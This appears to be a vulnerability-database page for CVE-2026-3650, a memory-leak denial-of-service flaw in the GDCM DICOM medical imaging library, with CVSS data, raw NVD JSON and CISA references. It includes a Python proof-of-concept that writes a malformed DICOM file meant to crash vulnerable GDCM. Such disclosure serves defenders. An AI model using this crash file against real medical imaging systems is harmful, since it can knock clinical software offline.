Security Vulnerability Report
中文
CVE-2026-3650 CVSS 7.5 HIGH

CVE-2026-3650

Published: 2026-03-26 22:16:31
Last Modified: 2026-03-30 13:26:30
Source: [email protected]

Description

A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without properly releasing it.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Grassroots DICOM (GDCM) (具体受影响版本请参考 ICSMA-26-083-01)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # PoC script to generate a malformed DICOM file targeting CVE-2026-3650 # This script creates a DICOM file with a non-standard VR in the meta information # to trigger the memory leak in GDCM. def generate_malformed_dicom(filename): with open(filename, 'wb') as f: # 1. Write Preamble (128 bytes of zeros) f.write(b'\x00' * 128) # 2. Write DICM Prefix f.write(b'DICM') # 3. Write Meta Element Group Length (Tag 0002,0000) # VR is 'UL' (Unsigned Long), Length is 4 bytes f.write(b'\x02\x00') # Group f.write(b'\x00\x00') # Element f.write(b'UL') # VR f.write(b'\x00\x00') # Reserved f.write(b'\x04\x00\x00\x00') # Length (4) # Value: Length of meta info (arbitrary for PoC) f.write(struct.pack('<I', 100)) # 4. Write a Malformed Element (e.g., Transfer Syntax UID 0002,0010) # Standard VR is 'UI' (2 bytes). # We will use a non-standard VR 'XX' to trigger the parsing bug. f.write(b'\x02\x00') # Group f.write(b'\x10\x00') # Element # Malformed VR: 'XX' instead of 'UI' f.write(b'XX') f.write(b'\x00\x00') # Reserved # Length: Set a large length to force allocation f.write(b'\xFF\xFF\xFF\xFF') if __name__ == "__main__": print("Generating malformed DICOM file: gdcm_crash.dcm") generate_malformed_dicom('gdcm_crash.dcm') print("Done. Use this file to crash the vulnerable GDCM version.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3650", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:31.370", "lastModified": "2026-03-30T13:26:29.793", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without properly releasing it."}, {"lang": "es", "value": "Existe una fuga de memoria en la biblioteca Grassroots DICOM (GDCM). El error ocurre al analizar archivos DICOM malformados con tipos VR no estándar en la metainformación del archivo. La vulnerabilidad conduce a grandes asignaciones de memoria y agotamiento de recursos, desencadenando una condición de denegación de servicio. Un archivo creado maliciosamente puede llenar el heap en una única operación de lectura sin liberarlo correctamente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-083-01.json", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/gdcm/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-083-01", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.